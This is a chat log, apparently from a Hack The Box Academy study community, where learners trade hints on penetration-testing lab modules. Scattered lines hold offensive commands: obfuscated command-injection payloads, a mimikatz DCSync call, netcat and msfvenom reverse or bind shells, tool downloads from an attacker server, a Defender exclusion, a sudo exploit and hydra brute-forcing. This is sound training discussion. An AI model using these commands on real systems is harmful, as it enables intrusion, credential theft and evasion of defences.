why the new lines %0A ?

Since assignment 3 i start the payload with that, because it worked every time. second one because i thought it was nessecary.

No not yet, trying out bruteforcing the subdomains I found with dig- is that right?

well it is not necessary right now

and the third, in the base64 cmd is to replace a space char

you can use IFS or tab for that

no just on inlanefreight.htb .
try with both the Pwnbox / your Attack box or reset the target and try again.

Hello. This script doesnt work. It says when running the script that it's not authenticating. How can I fix it:

USER user 
password 
binary 
GET ftp.py 
bye ```

||bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=)|| gives me no output but a 200 code, with ||%0a%09$bash(base64${IFS}-d<<<ZmluZCAvdXNyL3NoYXJlLyB8IGdyZXAgcm9vdCB8IGdyZXAgbXlzcWwgfCB0YWlsIC1uIDE=) ||i get the ping results only

is this the script?

make sure that the base64 or bash cmd is not blacklisted

Got the same results whenever i obfuscate them (at least, tried several options). But if it was blacklisted, it should give me an error? Invalid input?

I did it 🥳

Nice! What brought your solution?

Fumbling through enumerating the subdomains and then finding the answer on the forums while I was doing that 😂

I was thinking I had to use a different target dns server but I didn't

had to learn more about what a zone transfer actually is

Google brings too much sometimes. But a good way of checking your way

Recognize that haha! DNS transfers kept me busy for a while

Hey, doing the footprinting MSSQL module. I was wondering if there was a way to use the named pipe to connect to the service from a Linux machine. mssqlclient does not seem to support this

I used mpacket-mssqlclient for that, you missing an important flag for it?

I logged into MS01 using svc_sql. I can access the admin powershell from this user. i tried to install RSAT but it popped an error. I dunno what else to look for

I performed a kerberos but it only returned the hashes I retrived from the initial foothold

nope I'm talking about within the machine itself, think post exploit pillaging

I dumped lsass and got the cleartext

and username

thanks. I thought since the module is on ad I had to use ad tools. I guess I get why they say to follow the path cuz everything is connected

if only someone wrote a tool to make that process easier

they have and those are peas and autopwn scripts

but its forbidden

they will make the work easy but they suck the skills from young pentesters and make them sk's

my level is not high enough to afford the backlash of the forbidden scrolls.

peas doesn't have autopwn stuff, and any tool is allowed in cpts

I'm talking about lsass and stuff

ooh those

well I guess I can write a simple ps script for that but nothing complex

Passwords Credential Hunting in Linux

Maybe I'm tired today but that just took my soul

just crossed another one off. AD skills assesment and currently at 99.17% . Exam getting closer :/

manged to do it without tips or any help tho so feeling a lot better

wdym by logon to? winrm? rdp? or physically logging on?

well here's a list of edges bloodhound collects, filter by those and the username https://bloodhound.readthedocs.io/en/latest/data-analysis/edges.html

no, I don't see querying every machine the user can logon to being useful

if you have DA, you can safely assume the account can logon to every machine

and there's no way to check physical logon, rdp/winrm can be disabled but they can still login physically

sharphound has the loop thing which you can let it run for hours and catch hasSession, that's a way to know the user is logged on for sure

can anybody help me the api key question in JavaScript Deobfuscation is showing incorrect answer for the api key

I am really confused with dcsync .\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:INLANEFREIGHT\tpetty /domain:INLANEFREIGHT.LOCAL" "exit" I checked the permissions for this user and still I am getting auth error. I tried to rdp using the creds and hash but it did not give me a session. I then tried to use runas even then its not working any idea why ?

wtf where did the messages go, why am I talking to myself

i love when people delete their messages and remove context lmao

or if a mod did to gaslight you

Hello, I'm very new and working on my first module. I think I'm on the right track but would love some guidance. I'm on the Firewall and IDS/IPS Evasion - Hard Lab and ran this nmap scan: sudo nmap 10.129.2.47 -Pn -n --disable-arp-ping --packet-trace
This is the output:

PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
Service Info: Host: NIX-NMAP-HARD

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1154.52 seconds

Now I feel like I should do something with port 137 but that's where I'm kind of lost. I feel like I could do something with the scripting engine but idk what information to feed it to find an ideal means of attack. Am I on the right track or am I getting tripped up on nothing? Also before this scan I did a default scan and saw that tcp 22 and 80 are open. Any guidance would be appreciated.

Has anyone here done the new CRT exam?

re-read the section regarding firewall evasion: specifically - DNS proxying, Syn Scans and source ports are your friend

Thank you, will do.

I'm going to be doing the AD skills assessment probably tomorrow or day after, how was it? Pretty straightforward? Also congrats! You're going to crush the exam!

Okay after re-reading the sections you suggested I got to a point that I know I'm on the right track. I got the service info for port 22 and 80, but for 50000 it came back with tcpwrapped. After changing my scan options I got that it was ibm-db2. But when I use netcat to try and talk with the port it says permission denied.

Source ports are your friend

reading these i feel like such a noob

it is if you have some experiecne, SA 1 can be done with 4/5 commands

jesus the pivot they give you for the kerberos attacks module skill assessment is so slow

setting up a proxy just cause its unbearable to use

I was using the right source port but wasn't running it as sudo. That's what the problem was. Thanks for the help.

👍 it helps to actually read the error

Permission denied is usually a bash error

Good to know. I'll keep that in mind going forward.

Hello, I am new here, I want to ask how blocking a Facebook account offended you

?

2 things:

1. where is this going?
2. this really isn't the channel for that

read #welcome and #rules

Where is the right channel for me

To solve my problem

facebook's discord

reading the card explains the card the linked channels, informs you of what the server is about

this server has nothing to do with facebook, nor any social media

hey, u got any update on this? atm i m using try and error... i think this cant be we way... :/

My only experience is with the AD modules so hopefully that's sufficient, I've been going over each AD section at least twice because I admit it's out of my element a bit but I think I'm getting the hang of it. I was a bit confused last night when I was reading the Kerberos Double Hop problem section but that might have been because it was 4 am and I was tired so gonna look at it with fresh eyes today

all the info you need to finish the assessments are in the module so it's all good. the double hop problem is easy to solve, just don't double hop authenticate directly

okay so I did understand the section because I kept thinking to myself, "couldn't you just authenticate directly and avoid this entire problem" lol

But I suppose there are scenarios I'm not considering where you'd need to double hop

when you don't have a pivot set up and need to winrm inside a winrm, sure. but you can always load rubeus and inject a ticket

^

right that makes sense. This module is really teaching me how little I know about the Windows OS lol

I mean it's also showing how dumb it can be

but AD is good for permission delegation ¯_(ツ)_/¯

i can help u

I mean there's nothing inherently insecure with AD, as with all configurable systems, it all depends on how it's set up. ex. even the best edr can be made useless if it isn't configured properly

yep

that's why i said dumb, not necessarily insecure

For the Kerberos Attacks skill assessment is it supposed to be that all the impacket scripts return ldap errors even with valid credentials or am I just doing something grossly wrong?

it shouldn't

did you add dc to hosts

yup, netexec can use the same creds and talk to the DC over SMB and LDAP just fine

its literally just the impacket family that is complaining with the same creda

doesnt matter if I do it from my host or the provided attack host either

weird, I don't think I used impacket for the SA

[-] Error in bindRequest -> invalidCredentials: 8009030C: LdapErr: DSID-0C0906B5, comment: AcceptSecurityContext error, data 52e, v4563

the error in question

the invalid credentials are misleading though as they def work. Google suggests its an issue with the ldap library impacket uses possibly.

Guess ill just have to mess around without impacket 😭

you don't need impacket for that I think, but maybe reset the lab

I may be having a slow day:
Password Attacks -> Windows Lateral Movement
-> Pass the Ticker From Linux
I am having issues accessing the david@inlanefreight.htb account - My steps below:

1. add the spawned machine ip to /etc/hosts with inlanefreight.htb
2. attempted to access via domain name with user provided
   -> ssh david@inlanefreight.htb -p 2222 # type yes and the password provided by HTB - not able to log in
3. Attempted to access using the username@ip-addr -p 2222 > yes > password given by HTB

Not able to get access. Is there something I am missing?
Oh yea, I did reset the machine, my kali vm, and the vpn connection.

i thought it was inlanefreight.local, not inlanefreight.htb

but i could be wrong, it's been a minute

Copied straight from HTB
SSH to 10.129.215.16 with user "david@inlanefreight.htb" and password "Password2"

also wdym password provided by htb? the only password provided is for htb-student

ahhh

they may have changed that section or i missed it

¯_(ツ)_/¯

@fathom pendant Most modules I've recently done have been inlanefreight.htb, with the exception being the AD module which has been exclusively inlanefreight.local

it's been a minute since i've done that module

so i couldn't recall if they used .htb or .local

what other mdoules use .htb? I don't remember seeing it

also the username would be david@inlanefreight.htb@ip

just as the fyi

I'm doing all the modules in order and almost any module I can remember before the AD enumeration & Attacks module was using .htb

It messed me up at first cause I assumed in the AD module it was .htb and didn't read carefully that it was something different

a lot of them use .htb as just the standard tld for them

Thanks a bunch. Wasn't aware of that. david@inlanefreight.htb@ip-addr

yes because it's a domain user

i would suggest the academy to use other TLDs like .gay or .hom

It's always been .htb for, me, but I have only been at this for a month or so

no

that's for boxes, don't remember those in academy tbh

yes

are BoF modules good for OSCP prep?

most modules, especially the more web related ones, will use the .htb

i don't think BoF is on OSCP anymore

I heard it wasn't anymore as well. WOnder what the replacement will be.

a friend said that it depends, if you are lucky or not

Over 300 results for .htb in my obsidian notes for HTB academy it was used a lot in the earlier modules for sure

i mean; you can easily google the pen-200 course

bc they change the machines every month or smth

there isn't

and find all the covered domains

you could only still find it before they transitioned to the new AD set

thats cool

my small brain wasnt able to learn all of that

so the CPTS course should cover everything

it covers most things that would be on OSCP

Speaking of OSCP if I read this correctly you're not permitted to use MSF during the exam, and this might sound like a really simple question but there's been a lot of HTB modules that rely on MSF to set up a multi-handler listener to catch shells. How would we do that without MSF? Netcat?

i think there's like a few differences

you can do a lot of things without msf

msf is mostly just a collection of PoC exploits ¯_(ツ)_/¯

what i cannot even use multi-handler?

Yeah I've been trying to not use it at all tbh, but I was just doing a module and I realized I don't know how I would set up a multi-handler listener without it which seems like a pretty important thing to know how to do

netcat works

Don't take my word for it, I just remember reading on their website that certain tools like metasploit aren't permitted so I assumed that would also encompass the multi-handler listener

pwncat-cs works

you can use it for one target

Okay that's what my first thought was. I'll have to look into pwncat-cs put that in my toolbox

same for me

pwncat autoinjects a stable shell in to the listener

I can generally answer anything about the OSCP as a former OffSec employee if needed

Feel free to DM

i.e. saves the whole python3 -c 'import pty;pty.spawn("/bin/bash");' thing

oh that's cool, I gotta try that

pwncat also has some recon tools

nah im gonna build my own listener in rust idc

there's already a rustcat

mine will be better

Can I pay for the OSCP exam with an organ, I think that would be cheaper

See if they will accept it, bribes@offsec.com

are you able to comment your thoughts on them increasing the exam difficulty, but not so much on updating the materials

I think the increase in exam difficulty is subjective. For some, AD is much easier to understand then that of a BOF which you more then likely will not be doing unless you are going into binary exploitation and such. For others BOF was super easy.

I made a little progress but Im not sure how I can do the next step without impacket unless Im expected to spin up a windows host.

Really just a matter of what does the individual struggle with more

yeah it's subjective but I think they increased the overall difficulty for the latest sets, not just about a specific topic

which question

Difficulty is just a subjective thing though so hard to say.

Honestly in hindsight I don’t think my exam was that difficult

in-between the which user allows you to connect as admin to the server with unconstrained delegation and the next one.

I know the user because bloodhound still worked, and I know what attack I ought to do to gain their creds. But the main tool for it is impacket related.

Im looking at some alternative tools now that arent in the module to try them out.

I think its also the "luck of the draw" on what you get host wise and then do you have weaknesses that unfortunately come to light on your exam from your exam host set

And that was supposed to be the impenetrable set

I think it was a little far fetched, but it’s not too uncommon

isn't it just winrm/rdp into that server and do the unconstrained delegation attack

I dont have the pass for the user to rdp into yet

I just have the username

ah, what attack can you do if you have a username

kerberoasting

yeah, netexec can do that too

it's definitely not difficult, just imo the oscp materials doesn't come even close to preparing you for it

yeah will try that out, my pwnbox instance reset on me(im at work lul) so Ill have to reset up some things

Im just curious what the intended route was because the module was before that was added

this is true, you can get unlucky and get a more diffcult set

I thought cme can also kerberoast, it's not just a netexec thing

howdy folks can someone whos completed doc and reporting verifiy my svc_reporting hash real quick in a dm hashcat isnt reqonizing it

The course not so much no, but I do think the mock exams are fairly similar to what you can expect

darn apparently Inhave actual work to do

parts arrived. ill have to return to the assessment later

I honestly don't remember anything about the mock exams to agree or disagree so I'll take your word for it

Which assessment?

Kerberos Attacks. Has some oddity in it

Lol yeah no need to spend more time on it now

What’s wrong with it? I remember helping someone else with it

pretty please with cherries on top

impacket just doesnt work for some reason

What part?

any part. impacket straight up doesnt authenticate properly

what hash is that, you can just send the first part

svc_reporting:7608:aad3b435b51404

hash type?

hey folks, been struggling with the last question for Kerberos Attacks: Skills Assessment. I managed to catch j*k krbtgt but when i try to access the \DC01\Secret Share\flag.txt it tells me the network name cannot be found. What am i not getting this time?

ntlm

i dumped the ntds

i tried not specifiying the type and it still didnt work

just take the part after 7608:
aad3b435b5140...:nthash

You have creds yet or?

the aad... is also typically an empty part of the hash, id skip it and use the next part of the hash.

yeah, even ran bloodhound with em.

A user or D user?

i think it's both, I'm spinning up the lab to test it out

d user, working on a user

have you done the unconstrained delegation attack?

have a couple diff tools I can try out if work slows down again

getting token length exception when i do -m 1000

but its weird impacket doesnt work

did you
1: copy the whole hash
2: make sure you're using the right mode

how do you think the lynda.com people will influence the lab environment there? any insights or did you leave before they got on board?

i'm pretty sure it's ntlmv2 not ntlm

their labs are so terrible but the community is excellent 🙂

I was attempting PtH attack, seeing that the only tool present on the host is Rubeus (i thought it means that that is all that's required) and while monitoring with it i got the user's ticket

he said it's from ntds, so -m 1000 is correct

I was let go in January 2023 so I think that was before lynda or whatever got involved

well the question specifically mentions unconstrained delegation

not working maybe wrong hash lsass dump transfer is taking forever and a day

and rubeus is the tool they teach for that attack type too

ah missed that part

fair point, my bad. Thank you

huh lsass and ntds won't give you the same data

yeah i was gonna try again with what i get from the extraction since the dump from ntds isnt working for me

have you done the module can i dm to compare with what i got

I don't have the raw hash, it should be something like aad3b435b51404eeaad3b435b51404ee:a1a9bb19bc5cfa482120111111d97417

just to confirm, we are required to upload other tools? My reasoning is: if there is already Rubeus but nothing else it means that thats's the only tool needed.

rubeus is all you need

ok yeah I'm getting the same error

ok cheers

yeah afaict its to do with the ldap library they use that doesnt support some AD setting.

hello , im on the shells and payloads module and trying to set a bind shell but i try to bind a bash shell to tcp session using : rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>& 1 | nc -l [IP][port] > /tmp/f

it doesnt seem to be executed

is it because of my pc?

that's a revshell, not a bind shell

its literally says a bind shell in the bind shell section :0

oh oops yeah it is, never used it before

so if it's a bind shell once you start it, it will listen for a connection

...wait why are you running it on your host

wait..

okay im just dumb

thank you man !!

literally the first thing i noticed too

lol

I'm missing something. So while on the S****01 I monitor with Rubeus and catch j** tgt. I renew it, then i ask for tgs to the cifs of dc01, and I get it. But i still cannot access the Secret Share. I'm using the steps from the lesson on the unconstrained delegation. Please help

you don't need to specifically request a tgs, renew the ticket to have it injected then just access the share

I just copied it and turned it into a ccache

with /ptt right?

i can see the ticket in my cache (klist) but it still won't let me access the share

you pulled something out of an NTDS file but can't crack it?

i got it thanks

ah ok

what's the error

The network name cannot be found

well did you make sure the netowrk name is right?

Take it to DM if you want to share specifics please 🙂

hi g0blin

Yo 👋 How're things?

pretty decent, started a 5 week course "Intro to PC Operating Systems"... So far it's just been winders 🙄

Well I hope it gets interesting 😉 Not to say Windows isn't interesting, but on the name of the course.. unsure it'll go very deep 😅

Is it a security focused course, or just like an introduction?

just an intro stuff; basics - minor background on OS stuff

some silly definition stuff

differences like 32-bit being limited to only 4GB of memory

Is this a stepping stone to another course or something, or it just grabbed your interest?

stepping stone for cybersecurity stuff

another course i'm taking is Intro to Psychology

Nice, is this on OpenUniversity or something?

nah; it's through Miller-Motte University. Exp graduation in early 2025

That's not how it works..

I mean technically it is offtopic.....

but if theres anyone thats allowed to break the rules its you 😂

There's no offtopic rule 🤷‍♂️ But ok

Just enjoy engaging with people, wherever it is.

People have been muted/booted here before

ye

it just depends on the extent of the offtopic convo

yeah thats the core of it

Well I guess I'll shut up then 😊

Usually its just us having to tell some unverified person to verify to access the general chat

and its a 75/25 split of either raging or actually following instructions

hey can anyone help me crack a hash

Getting weird results in active directory. I am not getting a transfer from my python http server with:

Invoke-WebRequest -Uri "http://<ip>:8080/chisel.exe" -OutFile "C:\chisel.exe"

but after I do

Invoke-WebRequest -Uri "http://<ip>:8080/PowerView.ps1" -OutFile "C:\PowerView.ps1"

I do Import-Module .\PowerView.ps1 and am then able to transfer chisel. The PowerView transfer works first try no problem

Why?!

PowerView.ps1 isn't imported before I transfer PowerView, so I'm not sure what's going on!

Hello guys can anyone help me with this module WINDOWS EVENT LOGS & FINDING EVIL i am quite new to windows event logs i thought i created the correct view and still cannot solve it

i can

which part are you on ?

in powershell do Add-MpPreference -ExclusionPath . and it should save there.

i am on the very first part😅

oh. they dont show win-event til the end

what are u trying

i created a custom view showing only events that changed the policy

this is the exact question: Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

i created a filter based on the computer name that was relevant to the event that took place on 8/3/2022 and only showed audits from that computer

I tried that but there is no logs under that id

Username from question 5 and password from question 6 of the Active Directory Skills Assessment 1 does not give RDP access.

one sec i'm spawning the instance

Hi, Im new

Is it yes or yes do it on Linux?

bet

BloodHound GUI node information is cut off, any way to fix this? Hasn't been reported on the github issues page but I wanted to check if anyone has a fix first before posting

and it's formatted weird

filter for event 4907 and use the date in the question to find your way to the answer.

Anyone have a hint on the last question of AD Skills Assessment 1? I am trying to RDP in with the tp***y credentials, but it is not working.

I tried all three ip addresses, even the DC01, just to be sure

you gotta tunnel and pivot if you havent

and i belive tpetty was ment to get admins hash not rdp the rdp is with admin

Anyone else having issues spinning up targets in any of the academy modules?

I was just about to ask this,

I can't get any targets to spin up

Haha ok, so I'm not nuts

Same, refreshed. Logged out and back in. Nada

Darn it, I'm on a roll also

it's working for me

Which module you on? I'm on the linux priv escalation one

kerberos attacks, I can try spawning yours in a sec

ok sweet

I'm on the log rotate sub module

Having similar issues with Nibbles - Enumeration, its been "deploying" for awhile now and I cant stop it..

my target is spawing for a while alr.

ok, same results in other labs for me. Just tried spinning up the assessments in the nmap module. Same results. Just spins and doesn't come up

can already for mine

oh wait, they just came up. someone rebooted something lol

So I ran secretsdump for the Administrator user for the DC01 ip address. I am kind of stuck here now.

Do I kerberoast at this point? The DCSync Module dead ends

yeah it spawns fine, you can try switching servers if you run into the same thing next time

refresh the page

Or should I try to crack the hash?

It came up eventually, but it took an unusually long time.

You're now using the right tool but I sincerely suggest that you go over the module as it seems you are rushing it and not soaking in the material.

Which module? I hit a dead end.

At least with the dcsync module

I got the kerberos tickets, but there was no plain text

hi I am logged into this IMAP server for the IMAP/POP3 section of footprinting. I'm trying to get the administrator's email address. Attached is what I have tried so far.

can someone help?

I managed to log in as another user besides admin via sslconnect

Help In what way

I want to figure out the administrator email address. Please don't give me the answer but I have been stuck on this for a few days and could use a push in the right direction.

that would be great please

No way I'm busy person

Why is this not working?!

I imported PowerView.ps1

I'm trying to finish DSCyncing the last question of the AD Skills Assessment 1

then why even reply

How do I finish DCSync? I have run secretsdump, but can't get anything in my powershell to work

it's been a while, if I remember right, authenticate to the email server and poke around. also take a look at this https://www.atmail.com/blog/imap-commands/

Which one of these do I use?

I can't seem to find the right hashcat mode for any of them. Just want to make sure I am looking at the right ones.

what can do you with a ntlm hash besides cracking it

which one is the ntlm, the one with 500?

I'm thinking pass the hash? Can't figure it out though.

The one you're currently on, footprinting, and attacking common services

So I was able to figure it out, did a pass the hash with psexec, had to go back to the password attack module to figure it out

So the first hash here, what kind of hash is it? Looking it up online it showed as MD5.

I thought it was an NTLM

could be the LM portion of the NTLM hash

:) usually with pth you use the NT bit

maybe pay attention to the modules https://academy.hackthebox.com/module/74/section/1350

that one's in the infosec fundamentals path; it's not in the main pentester path

oh is it not

it is indeed not

seems like fundamentals are missing then

the only other prereq path it's on is the soc analyst pre-req path

I just used the whole hash of the output from secretsdump

The first one pictured. I cut off the remaining portion in the screenshot for spoilers

It worked

Just trying to understand why because the module used a different format and really didn't go in to detail

the lm part of the hash is usually a blank hash, it's just a shortcut to let impacket know without having to paste the whole thing

The module that Xre0us linked explains all of that. Maybe go over the Information Security Foundations path before continuing the Penetration Tester path.

don't ntlm hashes not care about capitalization?

or am i misremembering

When does MS anything care about capitalization? But to answer directly, no yes.

you mean I can run rEgEdIt.eXe and it doesn't care? who knew

LM hashes are case insensitve. NTLM are def case sensitive.

isn't that only the lm hash/password?

yeah the nt hash is case senstivie

i knew one part was ¯_(ツ)_/¯

Oops, yes >.<

Anybody able to get Password Attaks - Pass TheHash target to spin up?

change vpn regions

how do i access the tareets o
Shells & Payloads

Page 16
The Live Engagement

The Live Engagement

you're given a linux attack host to rdp into

if you're referring to the web targets: firefox works

ik but firefox isnt there on the attack host

yes it is

run firefox in the command line

also make sure you take notes of the desktop ;)

oh i c danke

what happened

Hi all, I need little help and info on Module:Linux Privilege escalaiton : section SUDO lab, I am trying to compile the exploit as per the section provide info but i am getting glibc6 error saying c file cannot be compilted because glibc libara is missing . I am following this process to create the binary.

cry0l1t3@nix02:~$ git clone https://github.com/blasty/CVE-2021-3156.git
cry0l1t3@nix02:~$ cd CVE-2021-3156
cry0l1t3@nix02:~$ make

is there a problem in the lab target machine or something?

how are you cloning it; afaik the target machines don't have internet access?

does anyone my ip adress for that

└──╼ $msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.129.204.126 LPORT=4444 -f war > shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes

┌─[htb-student@skills-foothold]─[~]
└──╼ $nc -lvnp 4444
listening on [any] 4444 ...

i uplaod to tomcat then go to the tomcat ip address/shell

but it not give the shell back to me why?

got the download on my attack box, launched http server , wget on target box.

gotcha

use a different LHOST, perhaps the one on the same subnet

do ifconfig to see all the interfaces

followed two senarios. 1. Downloaded precompilted binary to target. error saying glibc6 missng. 2. Downloaded post compiled binary , same error target box has glibc 2.27 and needed is 2.34

i cannot downoad glibc as apt get install not in my rights on box

can you not do a static compile?

yes, i cannot do the compite on the target box

this is not the path you need to follow to get the flag for the sudo section

i know it must be straight forward , just download binary , compile run and be root but target box is stopping me by not allowing me to compile the hex.c code

listen to dpgg he's actually done it

@autumn pilot any advice on this please

i've given you

choose a different path

msf6 exploit(50064) > exploit

[-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created.

restart msfconsole

can anyone explain why i used the username nda password correct

ok ty

sometimes it's dumb

can you advice on this. is this machine issue or something else i am doing wrong

literally this

there are 2 exploits given in the section, check the sudo version to find which one to use

i restarted but its the same answer

did you set all the options?

yrs

PASSWORD admin123!@# yes Blog password
Proxies no A proxy chain of format type:host:por
t[,type:host:port][...]
RHOSTS 172.16.1.12 yes The target host(s), range CIDR identi
fier, or hosts file with syntax 'file
:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connec
tions
TARGETURI / yes The URI of the arkei gate
USERNAME admin yes Blog username
VHOST no HTTP server virtual host

Payload options (php/meterpreter/bind_tcp):

Name Current Setting Required Description

LPORT 4444 yes The listen port
RHOST 172.16.1.12 no The target address

Exploit target:

Id Name

0 PHP payload

i think this one requires you to set an additional option

got this @next bronze

set VHOST

vhost to domain?

ah ic dankeschoine

ye

Module : INTRODUCTION TO ACTIVE DIRECTORY
Question:
why Domain Controllers are Global type?
why the need change in another Domains?
can Domain Controllers control Ressources in another Domain and why the need that ? in which Usecases?

what

Domain Controllers only control their domains, and are linked via forests

then why there Group are Global typed?

interdomain trusts

allows them to control certain aspects of other domains but not full control

https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups

make sense, thanx

Many thanks @Xre0uS , @fathom pendant , @autumn pilot for point me in right direction. I was banging my head on this for the 2nd day.

sudo issue

got it working.

ask to dm

don't just dm without asking for permission

u right .
i just did not want to right a long question here in the group.

That's what this community is for 😉
You can ask your questions about modules here at any time

Hey guys

Interactive Section with Target

I help with the practice question

people will be much more willing to help if you actually post your question

what do you need help with?

Hi guys! Any ideas why I can never access a Python server hosted on my Kali machine. I use the tun0 IP and port number to try to browse from the target but no es bueno

It works fine when I serve it from Pwnbox

I do have uncomplicated firewall but have tried turning it off

did they make changes to pwnbox. there are way more interfaces than before

probably didn't turn it off right, either turn off completely or explicitly allow specific ports

Thanks!

Anyone i can dm for skills assesment 2 part 1? I have a list of users just cant seem to find the passwd on the active directories module

AD enum & attaks SA 2 q1?

yup

what are some ways you can get a username and hash if you don't have domain credentials

you're already in the internal network

as-rep roasting or password spraying is what im thinking

but havent gotten it yet so its probably something else

i have the username list from kerbrute

so i have a list of usernames and emails that im trying to as-rep roast or passwordspray. Tried a few passwords, but im afraid to lock out the users so i

didnt try more on that

you can also try listening to the traffic

so ||LLMNR||?

hello , wondering if someone knows why some techniques works when I am in the internal network , and did not work when I use pivoting with tools like ligolo ?

would think they would connect back to me tho. I figured i needed some way to force that connection @next bronze

recall how poisoning works, it could be a broadcast

by force i mean like a writeable smb share that i can upload sfc or lnk files to

so correct me if im wrong. When they get a ip/domain they dont know, they ask "Hey, who is the owner here?" and responder picks it up and says "yo gimme dat shit"

just more pro over a network 😄

yeaaah

for any kerberos related things you need to add the fqdn of the dc into your hosts file

that went over my head

with the ip of the pivot host ?

thanks. I dont know why i didnt test that prior

no with the actual ip

the ip of the target ?

this can work but it's another mechanism, it's just a ntlm authentication in this case

the KDC is on the DC so that

thank you bro , it works

Password Attacks - Pass the hash - Can somebody explain this concept to me please. I performed a pass the hash attack and gained access to julios account but now which machine am I setting up the listener on? which machine am I inputting the rev shell command etc. Thanks in advanced

im so lost rn. I have the username and password. But i cant login. How am i supposed to get access to this machine lol

check what services are open that you can use

yeah i know. I feel like i have 100 times now

i guess you are in MS01 , as mentioned the DC01 can only connect to the MS01 (which is your machine rn ) , invoke-thehash will allow you to run command on the target (DC01 in this case ) using the hash , so you will create a listener on your machine MS01 , and run rev shell on DC01 using Invoke-thehash , you can always use hostname to figure out where you are

Followed the steps in the module and I cant get the reverse shell. not sure what Im doing wrong

is the ip and port correctly configured

Yea

I need to set up NC on ms01 and put the rev shell script in DC01 correct?

yeah , just make sure the ip and port are correct

After running the script 3 times, it finally said "connected" and when I hit enter again the shell prompt popped up

looks like it was just taking a minute to load

Can I DM sm1 about Windows Privilege Escalation Skills Assessment - Part I ? Can't figure out why i cant pe using SeImpersonate...

why not? try juicy potato, use different clsid

already tried all clsid that i could find for this version of windows, also tried juicypotatong & printspoofer

The questions for the assessment seem to indicate that im supposed to find a password before the privesc, however i would like to understand why all these exploits arent working

does the user have seimpersonate

it does

then it should work

I have no idea what is goin on, I wanted to double modulate everything...

Did you have any trouble getting access to shares? I did the reverse shell part but I can't find why I can't access david or julio's shares

Theres a command to check files in that network

You need to pth first then using the compromised session, check the files

If that makes sense

You did that through rdp? I tried through my evil-winrm session but mimikatz prompt is spamming prompt then crashing throught this way

do you remember if it is the intended way ?

pth through mimikatz

Anyone who is doing/has done AD Enumeration & Attacks - Skills Assessment Part II

finding MS01 really slow ?

Let me try it

finally got it working after enabling SeAssignPrimaryToken and running juicypotato in CreateProcessAsUser mode. So weird its not working with SeImpersonate

Hello everyone hope yall doing great on this beautiful day todayyy. I was working on the command injection module on the new job path and got stuck on the pdf generator section. I was able to find the internal api but I don’t know what to do from here. A nudge in the right direction would be awesome.

Struggling with the attacking DNS module. Attempting to run subbrute on it and keep gettin gtrackeback errors. Any idea why?

com and htb are two different top level domains.
The resolvers.txt file should only contain the IP of the target

This password attacks module is by far the worst in CPTS, holy christ :<

lmao its rough but fun

it's long maybe hard but very useful

im on the password mutations part, can anyone please confirm 89230 being the right amount of words in the mutated list

having so many issues with disconnects bruteforcing ftp already...

all I did was mutate the given password list using the given rules -> filtered out any passwords under length 8. Gave me 89k passwords

mine is aroud 94k

interesting..

did you alter in the custom.rule file or?

or did you just mutate with the given custom.rule file without any changes

oh, i guess you didnt remove passwords, i get 94k too with my original file

i guess ill use that instead then and not filter out any passwords under 8 length

mine was also 94044
I used the provided mutation rule

Please do not post any flags here, your flag has a typo. That's why it doesn't work

The flag has a typo in the database. Your site, support , and staff are all terrible. I have not once signed on to this platform with out encountering problems.

I am sorry if you are having problems with the site.
In this case, please contact support.

We all know you'll be back on the platform tomorrow

Wasn't talking to you

With that said, how do I get around this issue:

hydra -l sam -P new_list ftp://10.129.64.95 -v -t 32 -I
[DATA] max 32 tasks per 1 server, overall 32 tasks, 94044 login tries (l:1/p:94044), ~2939 tries per task
[DATA] attacking ftp://10.129.64.95:21/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[VERBOSE] Disabled child 0 because of too many errors
[VERBOSE] Disabled child 3 because of too many errors
[ERROR] all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found

inb4 this is the blindsql section....

congratulations on finding yourself

?

Finding myself?

ive been trying to find myself for years

@ember coral @limber river how many threads did you use in hydra? And on the attackbox or VPN? Getting sick of connection errors...

I think you had to use like 48 or something? i forget but i remember reading it on the forms

I use vpn with -t 16

• don't spoil on others

It's not spoiling though. Thats straight from the cheatsheet

yep even 16 threads gets me insta connection errors

im going to exploDEEEEEEEEEEEEEEEEEEEEEE

Module: File Transfer

Trying SMB upload to share made by wsgidav
Command:
sudo wsgidav --host=0.0.0.0 --port=8887 --root=/tmp --auth=anonymous
I used:
my kali:
dir \\10.10.15.204:8887\
On windows box:
copy C:\Windows\System32\drivers\etc\hosts \\10.10.15.204:8887\
I think there is a problem with the share name. What is the share name for the share I created

The dir command on Linux doesn't understand things like SMB shares.

Is the Attacking DNS , running subbrute supposed to take forever? lol its finding results but been running over 30 minutes now

If you want to access the share from a Linux machine, you'd need to mount it first

Someone please correct me if I'm wrong 😅

either mount an NFS OR use smbclient to reach it (if it's smb)

use a small list

also with SMB; you need to specify a sharename

anyone whos actually in the field whats the usual length of your reports what are your reports usually composed of any tricks or tips or cheats with writting reports trying to hone this skill before I take the test

But even if you see the copy command I used on the windows box that didnt work either. It said the share was not recognized or something

The command didn't include a share name in the path

Check the module notes 🙂

If I didn't include the share name then the root "/" should be sufficient right? But it is not sufficient

That's not how SMB shares work

SMB hard requires a sharename

it's not an optional thing

You're connecting to a computer. The computer has shares, which relate to a shared path on the computer.

it likely defaulted to "Share" or something like that

Do u have an idea about what th share name could be

you'd have to look up wsgidav documentation

if that's the command given in the module: then it should show you the sharename it might expect

Oh true, this

though usually you'd use smbserver to spin up a temp SMB server

never really thought of using wsgidav

damn, is it the EU peak hours messing with the infrastructure?

my best guess would be: that the sharename might be tmp

